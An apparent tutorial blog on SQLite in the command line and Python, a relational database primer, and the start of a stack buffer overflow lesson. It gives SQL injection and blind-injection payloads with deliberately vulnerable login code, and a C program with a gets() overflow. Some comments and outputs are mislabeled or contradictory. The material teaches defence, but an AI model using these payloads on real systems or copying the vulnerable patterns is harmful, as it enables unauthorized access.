sqlite> .open database.db
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
pass # ‘pass’ is just a placeholder; replace with actual DB operations
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn: 
    pass
```
Drop a Table

To drop a table, use the DROP TABLE keyword and table name,

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS test; # Delete the table named ‘test’ if it exists
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS test;
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
conn.execute(“DROP TABLE IF EXISTS users”) # Delete the table named ‘test’ if it exists
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
```
Create a Table

To create a table, use the CREATE TABLE keyword and table name, you also need to define the table columns and their types or properties

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS test; # Delete the table named ‘test’ if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
conn.execute(“DROP TABLE IF EXISTS users”) # Delete the table named ‘test’ if it exists
conn.execute(“CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)”) # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
```
List All Tables

To review all tables in a database, you can get the users table from sqlite_master using the SELECT keyword

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS test; # Delete the table named ‘test’ if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
sqlite> SELECT name FROM sqlite_master WHERE type=’table’; #Query the SQLite system table ‘sqlite_master’ to list all tables in the database
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> SELECT name FROM sqlite_master WHERE type='table';
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
conn.execute(“DROP TABLE IF EXISTS users”) # Delete the table named ‘test’ if it exists
conn.execute(“CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)”) # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
print(conn.execute(“SELECT name FROM sqlite_master WHERE type=’table’”).fetchall()) #Query the SQLite system table ‘sqlite_master’ to list all tables in the database
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    print(conn.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall())
```
Insert Into a Table

To add new data, use the INSERT keyword (Always parameterized, you do not want to create SQL injection)

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS test; # Delete the table named ‘test’ if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
sqlite> INSERT into users(id ,user, hash) values(1, “john”, “e66860546f18”); # Insert a new row into the ‘users’ table
sqlite> INSERT into users(id, user, hash) values(2, “jane”, “cdbbcd86b35e”); # Insert a new row into the ‘users’ table
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id ,user, hash) values(1, "john", "e66860546f18");
sqlite> INSERT into users(id, user, hash) values(2, "jane", "cdbbcd86b35e");
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
conn.execute(“DROP TABLE IF EXISTS users”) # Delete the table named ‘test’ if it exists
conn.execute(“CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)”) # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
conn.execute(“INSERT into users(id ,user, hash) values(?,?, ?)”, (1,”john”, “e66860546f18”)) # Insert a new row into the ‘users’ table
conn.execute(“INSERT into users(id, user, hash) values(?,?, ?)”, (2,”jane”, “cdbbcd86b35e”)) # Insert a new row into the ‘users’ table
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
```
Fetching Results

To all results from the database, use the SELECT keyword and .fetchall() or use can fetch one result the SELECT keyword and .fetchone()

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS test; # Delete the table named ‘test’ if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
sqlite> INSERT into users(id ,user, hash) values(1, “john”, “e66860546f18”); # Insert a new row into the ‘users’ table
sqlite> INSERT into users(id, user, hash) values(2, “jane”, “cdbbcd86b35e”); # Insert a new row into the ‘users’ table
sqlite> SELECT * FROM users; # Select all columns and all rows from the ‘users’ table
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id ,user, hash) values(1, "john", "e66860546f18");
sqlite> INSERT into users(id, user, hash) values(2, "jane", "cdbbcd86b35e");
sqlite> SELECT * FROM users;
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
conn.execute(“DROP TABLE IF EXISTS users”) # Delete the table named ‘test’ if it exists
conn.execute(“CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)”) # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
conn.execute(“INSERT into users(id ,user, hash) values(?,?, ?)”, (1,”john”, “e66860546f18”)) # Insert a new row into the ‘users’ table
conn.execute(“INSERT into users(id, user, hash) values(?,?, ?)”, (2,”jane”, “cdbbcd86b35e”)) # Insert a new row into the ‘users’ table
print(conn.execute(“SELECT * FROM users”).fetchall()) # Select all columns and all rows from the ‘users’ table
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    print(conn.execute("SELECT * FROM users").fetchall())
```
Output
```
[(1, 'john', 'e66860546f18'), (2, 'jane', 'cdbbcd86b35e')]
```
Find Data

You can fetch a specific data using the WHERE keyword

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS test; # Delete the table named ‘test’ if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
sqlite> INSERT into users(id ,user, hash) values(1, “john”, “e66860546f18”); # Insert a new row into the ‘users’ table
sqlite> INSERT into users(id, user, hash) values(2, “jane”, “cdbbcd86b35e”); # Insert a new row into the ‘users’ table
sqlite> SELECT * FROM users WHERE id=2; # Select all columns from the ‘users’ table where the user’s id is 2
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id ,user, hash) values(1, "john", "e66860546f18");
sqlite> INSERT into users(id, user, hash) values(2, "jane", "cdbbcd86b35e");
sqlite> SELECT * FROM users WHERE id=2;
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
conn.execute(“DROP TABLE IF EXISTS users”) # Delete the table named ‘test’ if it exists
conn.execute(“CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)”) # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
conn.execute(“INSERT into users(id ,user, hash) values(?,?, ?)”, (1,”john”, “e66860546f18”)) # Insert a new row into the ‘users’ table
conn.execute(“INSERT into users(id, user, hash) values(?,?, ?)”, (2,”jane”, “cdbbcd86b35e”)) # Insert a new row into the ‘users’ table
print(conn.execute(“SELECT * FROM users WHERE id=2”).fetchall()) # Select all columns and all rows from the ‘users’ table
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    print(conn.execute("SELECT * FROM users WHERE id=2").fetchall())
```
Output
```
(2, 'jane', 'cdbbcd86b35e')
```
Delete Data

You can delete data by using the DELETE keyword

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS test; # Delete the table named ‘test’ if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
sqlite> INSERT into users(id ,user, hash) values(1, “john”, “e66860546f18”); # Insert a new row into the ‘users’ table
sqlite> INSERT into users(id, user, hash) values(2, “jane”, “cdbbcd86b35e”); # Insert a new row into the ‘users’ table
sqlite> DELETE from users WHERE id=1; # Delete rows from the ‘users’ table where the id equals 1
sqlite> SELECT * FROM users; # Select all columns and all rows from the ‘users’ table
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id ,user, hash) values(1, "john", "e66860546f18");
sqlite> INSERT into users(id, user, hash) values(2, "jane", "cdbbcd86b35e");
sqlite> DELETE from users WHERE id=1
sqlite> SELECT * FROM users;
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
conn.execute(“DROP TABLE IF EXISTS users”) # Delete the table named ‘test’ if it exists
conn.execute(“CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)”) # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
conn.execute(“INSERT into users(id ,user, hash) values(?,?, ?)”, (1,”john”, “e66860546f18”)) # Insert a new row into the ‘users’ table
conn.execute(“INSERT into users(id, user, hash) values(?,?, ?)”, (2,”jane”, “cdbbcd86b35e”)) # Insert a new row into the ‘users’ table
conn.execute(“DELETE from users WHERE id=1”) # Delete rows from the ‘users’ table where the id equals 1
print(conn.execute(“SELECT * FROM users”).fetchall()) # Select all columns and all rows from the ‘users’ table
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    conn.execute("DELETE from users WHERE id=1")
    print(conn.execute("SELECT * FROM users").fetchall())
```
Output
```
[(2, 'jane', 'cdbbcd86b35e')]
```
User Input (SQL Injection)

A threat actor can construct a malicious query and use it to perform an authorized action (This happens because of format string/string concatenation)

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS test; # Delete the table named ‘test’ if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
sqlite> INSERT into users(id ,user, hash) values(1, “john”, “e66860546f18”); # Insert a new row into the ‘users’ table
sqlite> INSERT into users(id, user, hash) values(2, “jane”, “cdbbcd86b35e”); # Insert a new row into the ‘users’ table
sqlite> SELECT * FROM users WHERE user=” or ”=” AND hash=” or ”=”; # Select all columns from ‘users’ table, the WHERE clause is crafted to always be TRUE
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id ,user, hash) values(1, "john", "e66860546f18");
sqlite> INSERT into users(id, user, hash) values(2, "jane", "cdbbcd86b35e");
sqlite> SELECT * FROM users WHERE user='' or ''='' AND hash='' or ''='';
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed
temp_user = input(“Enter username: “) # Prompt the user to enter a username
temp_hash = input(“Enter password: “) # Prompt the user to enter a password (Usually, there will be a function to hash the password, it’s removed from here)
with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
conn.execute(“DROP TABLE IF EXISTS users”) # Delete the table named ‘test’ if it exists
conn.execute(“CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)”) # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
conn.execute(“INSERT into users(id ,user, hash) values(?,?, ?)”, (1,”john”, “e66860546f18”)) # Insert a new row into the ‘users’ table
conn.execute(“INSERT into users(id, user, hash) values(?,?, ?)”, (2,”jane”, “cdbbcd86b35e”)) # Insert a new row into the ‘users’ table
print(conn.execute(“SELECT * FROM users WHERE user=’%s’ AND hash=’%s’” % (temp_user,temp_hash)).fetchall()) # Execute a SQL query using string formatting to insert user-controlled values
```
from sqlite3 import connect
from contextlib import closing
temp_user = input("Enter username: ")
temp_hash = input("Enter password: ")
with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    print(conn.execute("SELECT * FROM users WHERE user='%s' AND hash='%s'" % (temp_user,temp_hash)).fetchall())
```
Malicious statement

If a use enter ' or ''=' for both username and password, the
```
SELECT * FROM users WHERE user='' or ''='' AND hash='' or ''=''
```
Which will always be true, break the WHERE clause down:
```
user='' OR ''='' → FALSE OR TRUE → TRUE
hash='' OR ''='' → FALSE OR TRUE → TRUE
```
Output

The result is every row in the users table is returned, regardless of username or hash.
```
[(1, 'john', 'e66860546f18'), (2, 'jane', 'cdbbcd86b35e')]
```
User Input (Blind SQL Injection)

A threat actor can construct a malicious query and use it to perform an authorized action without getting error messages regarding the injection (This happens because of format string/string concatenation)

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS test; # Delete the table named ‘test’ if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
sqlite> INSERT into users(id ,user, hash) values(1, “john”, “e66860546f18”); # Insert a new row into the ‘users’ table
sqlite> INSERT into users(id, user, hash) values(2, “jane”, “cdbbcd86b35e”); # Insert a new row into the ‘users’ table
sqlite> SELECT * FROM users WHERE user=” OR (SELECT COUNT(*) FROM users) > 0 — AND hash=’test’; # Determine if table users exists using only true/false behavior (e.g., login success vs failure).
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id ,user, hash) values(1, "john", "e66860546f18");
sqlite> INSERT into users(id, user, hash) values(2, "jane", "cdbbcd86b35e");
sqlite> SELECT * FROM users WHERE user='' OR (SELECT COUNT(*) FROM users) > 0 -- AND hash='test';
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed
temp_user = input(“Enter username: “) # Prompt the user to enter a username
temp_hash = input(“Enter password: “) # Prompt the user to enter a password (Usually, there will be a function to hash the password, it’s removed from here)
with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
conn.execute(“DROP TABLE IF EXISTS users”) # Delete the table named ‘test’ if it exists
conn.execute(“CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)”) # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
conn.execute(“INSERT into users(id ,user, hash) values(?,?, ?)”, (1,”john”, “e66860546f18”)) # Insert a new row into the ‘users’ table
conn.execute(“INSERT into users(id, user, hash) values(?,?, ?)”, (2,”jane”, “cdbbcd86b35e”)) # Insert a new row into the ‘users’ table
result = conn.execute(“SELECT * FROM users WHERE user=’%s’ AND hash=’%s’” % (temp_user,temp_hash)).fetchone() # Determine if table users exists using only true/false behavior (e.g., login success vs failure).
if result: # If a row is returned
print(“Login successful”) # Show the successful message
else: # If there is no row
print(“Login failed”) # Show the failed message
```
from sqlite3 import connect
from contextlib import closing
temp_user = input("Enter username: ")
temp_hash = input("Enter password: ")
with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    result = conn.execute("SELECT * FROM users WHERE user='%s' AND hash='%s'" % (temp_user,temp_hash)).fetchone()
    if result:
        print("Login successful")
    else:
        print("Login failed")
```
Malicious statement

If a use enter ' OR (SELECT COUNT(*) FROM users) > 0 -- for the username and any password, it will count how many rows exist in the users table. If at least one user exists, this expression evaluates to TRUE.
```
SELECT * FROM users WHERE user='' OR (SELECT COUNT(*) FROM users) > 0 -- AND hash='test'
```
Output

It will show login successful which indicates the users table does exist.
```
Login successful
```
If a use enter ' OR (SELECT COUNT(*) FROM userx) > 0 -- for the username and any password, it will count how many rows exist in the users table. If at least one user exists, this expression evaluates to TRUE.
```
SELECT * FROM users WHERE user='' OR (SELECT COUNT(*) FROM userx) > 0 -- AND hash='test'
```
Output

It will show login successful which indicates the users table does exist.
```
Login failed
```
Insecure Design

A threat actor may use any ID to retrieve user info (The logic receives users by incremental ids)

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed
temp_id = input(“Enter id: “) # Prompt the user to enter a id
with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
conn.execute(“DROP TABLE IF EXISTS users”) # Delete the table named ‘test’ if it exists
conn.execute(“CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)”) # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
conn.execute(“INSERT into users(id ,user, hash) values(?,?, ?)”, (1,”john”, “e66860546f18”)) # Insert a new row into the ‘users’ table
conn.execute(“INSERT into users(id, user, hash) values(?,?, ?)”, (2,”jane”, “cdbbcd86b35e”)) # Insert a new row into the ‘users’ table
print(conn.execute(“SELECT * FROM users WHERE id=?”, (temp_id,)).fetchall()) # Safely query the users table for a specific id using a parameterized query
```
from sqlite3 import connect
from contextlib import closing
temp_id = input("Enter id: ")
with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    print(conn.execute("SELECT * FROM users WHERE id=?", (temp_id,)).fetchall())
```
Statement will be
```
SELECT * FROM users WHERE id=1
```
Output
```
[(1, 'john', 'e66860546f18')]
```
User Input (SQL/Blind SQL Injection)

If you want to pass dynamic values to the SQL statement, make sure to use ? as a placeholder and pass the value in a tuple as (value,). The ? tells the db engine to properly escape the passed values. Escaping means that the value should be treated as string. E.g., if someone enters ' symbol which can be used to close a clause, the db engine will automatically escape it like this \'

Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed
temp_user = input(“Enter username: “) # Prompt the user to enter a username
temp_hash = input(“Enter password: “) # Prompt the user to enter a password (Usually, there will be a function to hash the password, it’s removed from here)
with closing(connect(“database.db”,isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
conn.execute(“DROP TABLE IF EXISTS users”) # Delete the table named ‘test’ if it exists
conn.execute(“CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)”) # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
conn.execute(“INSERT into users(id ,user, hash) values(?,?, ?)”, (1,”john”, “e66860546f18”)) # Insert a new row into the ‘users’ table
conn.execute(“INSERT into users(id, user, hash) values(?,?, ?)”, (2,”jane”, “cdbbcd86b35e”)) # Insert a new row into the ‘users’ table
print(conn.execute(“SELECT * FROM users WHERE user=? AND hash=?”, (temp_user,temp_hash,)).fetchall()) # Safely query the users table for a specific username and password using a parameterized query
```
from sqlite3 import connect
from contextlib import closing
temp_user = input("Enter username: ")
temp_hash = input("Enter password: ")
with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    print(conn.execute("SELECT * FROM users WHERE user=? AND hash=?", (temp_user,temp_hash,)).fetchall())
```
April 5, 2026
Relational Databases
Relational databases

Relational databases are a type of database that store data in a structured, table-based format. Each table consists of rows and columns, where each row represents a unique record and each column represents a specific attribute or field of that record. This organization allows data to be easily categorized, searched, and managed. The table-based structure ensures that information is stored consistently, making it simpler to maintain accuracy and integrity across the database.

The relational aspect of these databases comes from their ability to link data across multiple tables using keys. A primary key uniquely identifies each record within a table, while a foreign key allows one table to reference data in another. This system of relationships enables complex queries and data retrieval, such as combining information from different tables or enforcing rules that maintain data consistency. By defining these relationships, relational databases can model real-world scenarios more effectively.

Relational databases are managed using Relational Database Management Systems (RDBMS) such as MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. These systems provide tools to insert, update, delete, and query data using Structured Query Language (SQL). They also offer features for security, backup, scalability, and transaction management, making them suitable for a wide range of applications, from small business systems to large-scale enterprise solutions. Their structured nature and robust management capabilities make relational databases one of the most widely used forms of data storage today.

Example

A table named users with two fixed columns, id (Integer 4 bytes), and user (Text, max 30 bytes) and hash (Text 12 bytes)
```
+----+------+---------------+
| id | user |      hash     |
+----+------+---------------+
| 1  | john |  e66860546f18 |
+----+------+---------------+
| 2  | jane |  cdbbcd86b35e |
+----+------+---------------+
```
Relational databases (Pros and Cons)
- Pros of Relational Databases
  - Structured and Organized
    
    Data is stored in tables with rows and columns, making it easy to understand and manage.
  - Data Integrity
    
    Primary and foreign keys enforce unique records and consistent relationships between tables.
  - Flexible Queries
    
    SQL allows complex queries, joins, aggregations, and data retrieval across multiple tables.
  - Consistency
    
    ACID (Atomicity, Consistency, Isolation, Durability) properties ensure reliable transactions.
  - Scalability for Many Applications
    
    Suitable for small to large systems, from business applications to enterprise-level solutions.
  - Security and Access Control
    
    RDBMS systems provide user permissions, authentication, and auditing features.
  - Mature Tools and Support
    
    Popular systems like MySQL, PostgreSQL, Oracle, and SQL Server have extensive documentation and community support.
- Cons of Relational Databases
  - Complexity
    
    Designing a relational schema with proper relationships can be challenging.
  - Performance Issues at Large Scale
    
    Large datasets with many joins can slow down queries, especially in highly transactional environments.
  - Rigid Schema
    
    Changes to table structures (like adding new columns) can be cumbersome and require careful planning.
  - Less Suitable for Unstructured Data
    
    Storing images, videos, logs, or JSON-like data can be inefficient.
  - Scalability Limitations
    
    Horizontal scaling (sharding) is more complex compared to some NoSQL databases.
  - Cost
    
    Enterprise RDBMS licenses (like Oracle or SQL Server) can be expensive.
April 5, 2026

Stack‑based Buffer Overflow

A stack‑based buffer overflow happens when a program writes more data into a stack‑allocated buffer than it was designed to hold. Because the stack stores important control data (like return addresses), overflowing a buffer can overwrite that data and change how the program executes.

The following code contains a function named hidden that is never called during normal execution. However, a threat actor could exploit a stack‑based buffer overflow to redirect execution flow and invoke this function that lists the files in the current directory.

#include <stdio.h> // Provides printf(), gets()
#include <stdlib.h>// Provides system(), exit()
#include <string.h>// String functions (not directly used here)

void hidden() {
printf(“Hidden Function\n”); // Print a message to stdout
system(“ls -la”); // Execute a shell command
exit(0); // Terminate the program immediately
}

void vulnerable() {
char buffer[20]; // Allocate 20 bytes on the stack
printf(“Enter text:\n”); // Prompt the user
gets(buffer); // No bounds checking, Input longer than 20 bytes will overwrite adjacent stack memory
printf(“You entered: %s\n”, buffer); // Echo user input back
}

int main() {
vulnerable(); // Execute vulnerable code
return 0; // Normal program termination
}

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void hidden() {
    printf("Hidden Function\n");
    system("ls -la");
    exit(0);
}

void vulnerable() {
    char buffer[20];
    printf("Enter text: ");
    gets(buffer); 
    printf("You entered: %s\n", buffer);
}

int main() {
    vulnerable();
    return 0;
}

Compile the program with gcc

gcc # an open-source set of compilers and development tools for various programming languages
-m32 # Compile as 32-bit (simpler stack layout, x86 calling convention)
